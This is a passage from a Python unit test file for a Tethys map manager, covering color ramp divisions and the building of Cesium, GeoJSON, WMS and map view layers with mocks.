maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertIsNone(extent)
def test_generate_custom_color_ramp_divisions(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
num_divisions=10
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
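# From the expected values here and in the offset/first_division variants
# below, the division values appear to follow this formula (inferred from the
# test data, not quoted from the implementation):
#
#     val_i = (min_value + bottom_offset)
#             + (max_value - top_offset - min_value - bottom_offset)
#             * (i - first_division) / (num_divisions - 1)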
def test_generate_custom_color_ramp_divisions_val_no_data(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
no_data_value=0,
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a',
'val_no_data': 0
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_with_colors(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
color_ramp="Blue and Red"
)
expected = {
'val1': '100.00', 'color1': '#a50026',
'val2': '200.00', 'color2': '#d73027',
'val3': '300.00', 'color3': '#f46d43',
'val4': '400.00', 'color4': '#fdae61',
'val5': '500.00', 'color5': '#fee090',
'val6': '600.00', 'color6': '#e0f3f8',
'val7': '700.00', 'color7': '#abd9e9',
'val8': '800.00', 'color8': '#74add1',
'val9': '900.00', 'color9': '#4575b4',
'val10': '1000.00', 'color10': '#313695'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_first_division(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
first_division=0
)
expected = {
'val0': '100.0', 'color0': '#fff100',
'val1': '200.0', 'color1': '#ff8c00',
'val2': '300.0', 'color2': '#e81123',
'val3': '400.0', 'color3': '#ec008c',
'val4': '500.0', 'color4': '#68217a',
'val5': '600.0', 'color5': '#00188f',
'val6': '700.0', 'color6': '#00bcf2',
'val7': '800.0', 'color7': '#00b294',
'val8': '900.0', 'color8': '#009e49',
'val9': '1000.0', 'color9': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_prefix(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
prefix='foo'
)
expected = {
'foo1': '100.0', 'color1': '#fff100',
'foo2': '200.0', 'color2': '#ff8c00',
'foo3': '300.0', 'color3': '#e81123',
'foo4': '400.0', 'color4': '#ec008c',
'foo5': '500.0', 'color5': '#68217a',
'foo6': '600.0', 'color6': '#00188f',
'foo7': '700.0', 'color7': '#00bcf2',
'foo8': '800.0', 'color8': '#00b294',
'foo9': '900.0', 'color9': '#009e49',
'foo10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_top_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
top_offset=900
)
expected = {
'val1': '10.0', 'color1': '#fff100',
'val2': '20.0', 'color2': '#ff8c00',
'val3': '30.0', 'color3': '#e81123',
'val4': '40.0', 'color4': '#ec008c',
'val5': '50.0', 'color5': '#68217a',
'val6': '60.0', 'color6': '#00188f',
'val7': '70.0', 'color7': '#00bcf2',
'val8': '80.0', 'color8': '#00b294',
'val9': '90.0', 'color9': '#009e49',
'val10': '100.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_bottom_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
bottom_offset=900
)
expected = {
'val1': '910.0', 'color1': '#fff100',
'val2': '920.0', 'color2': '#ff8c00',
'val3': '930.0', 'color3': '#e81123',
'val4': '940.0', 'color4': '#ec008c',
'val5': '950.0', 'color5': '#68217a',
'val6': '960.0', 'color6': '#00188f',
'val7': '970.0', 'color7': '#00bcf2',
'val8': '980.0', 'color8': '#00b294',
'val9': '990.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_build_param_string_multiple_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar', baz='jar')
parts = ret.split(';')
self.assertIn('baz:jar', parts)
self.assertIn('foo:bar', parts)
def test_build_param_string_single_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar')
self.assertEqual('foo:bar', ret)
def test_build_param_string_no_kwargs(self):
ret = self.map_manager.build_param_string()
self.assertEqual('', ret)
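# Judging by the three assertions above, build_param_string joins keyword
# arguments as "key:value" pairs separated by ";". A sketch of the assumed
# behavior:
#
#     def build_param_string(self, **kwargs):
#         return ';'.join('{}:{}'.format(k, v) for k, v in kwargs.items())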
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_invalid(self, _):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
self.assertRaises(ValueError, self.map_manager.build_cesium_layer, cesium_type='WrongType', cesium_json=model,
layer_name=layer_name, layer_title=layer_title, layer_variable=layer_variable)
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_model(self, mock_gvsm, mock_bvl):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumModel',
cesium_json=model,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumModel',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=model,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
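# Two mock details make this pattern work: a MagicMock memoizes its
# return_value, so mock_bvl() and mock_gvsm() return the same object on every
# call, which is why the equality checks pass. Each such call is also
# recorded, so invoking mock_bvl() before assert_called_once() or
# assert_called_with() would add a spurious no-arg call and break them.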
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_primitive(self, mock_gvsm, mock_bvl):
primitive = [{'Cesium.Cesium3DTileset': {'url': {'Cesium.IonResource.fromAssetId': 512295}}}]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumPrimitive',
cesium_json=primitive,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumPrimitive',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=primitive,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer_all_pass_through_args(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
layer_id='LAYER_ID_PASS_THROUGH',
extent=[1, 2, 3, 4],
visible=False,
public=False,
selectable=True,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3]
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=[1, 2, 3, 4],
layer_id='LAYER_ID_PASS_THROUGH',
visible=False,
public=False,
selectable=True,
show_download=False,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3],
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
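# TILED and TILESORIGIN are GeoServer vendor parameters requesting tiled
# rendering (served through the integrated tile cache when aligned), and
# tileGrid tells the OpenLayers client how those tiles are laid out.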
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_all_pass_through_args(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH'
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_not_tiled(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
tiled=False
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous'
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='ImageWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_viewparams(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
viewparams = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
viewparams=viewparams
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'VIEWPARAMS': viewparams
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_env(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
env = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
env=env
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'ENV': env
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
def test_build_mv_layer(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
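# map_extent is a property, so it must be patched on the class with
# new_callable=mock.PropertyMock; assigning a MagicMock to the instance
# attribute would not intercept attribute access through the descriptor.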
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_popup_title(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
popup_title = 'Baz'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
popup_title=popup_title
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': popup_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_excluded_properties(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
excluded_properties = ['id', 'foo', 'bar', 'baz']
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
excluded_properties=excluded_properties
)
opts = ret['options']
expected_data = {
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'excluded_properties': ['id', 'type', 'layer_name', 'foo', 'bar', 'baz']
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_plottable(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
plottable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name', 'plot'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'plottable': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertDictEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_has_action(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
has_action=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'has_action': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_extent(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
custom_extent = [1, 2, 3, 4]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
extent=custom_extent
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(custom_extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_style_map(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
style_map = {
'Point': {'ol.style.Style': {
'image': {'ol.style.Circle': {
'radius': 5,
'fill': {'ol.style.Fill': {
'color': 'red',
}},
'stroke': {'ol.style.Stroke': {
'color': 'blue',
}}
}}
}},
}
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
style_map=style_map
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
expected_layer_options = {
'visible': True,
'show_download': False,
'style_map': style_map
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual(expected_layer_options, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_not_visible(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
visible=False
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': False, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
@mock.patch('tethys_gizmos.gizmo_options.map_view.log') # mock out geometry attribute warning
def test_build_mv_layer_selectable(self, _):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
selectable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
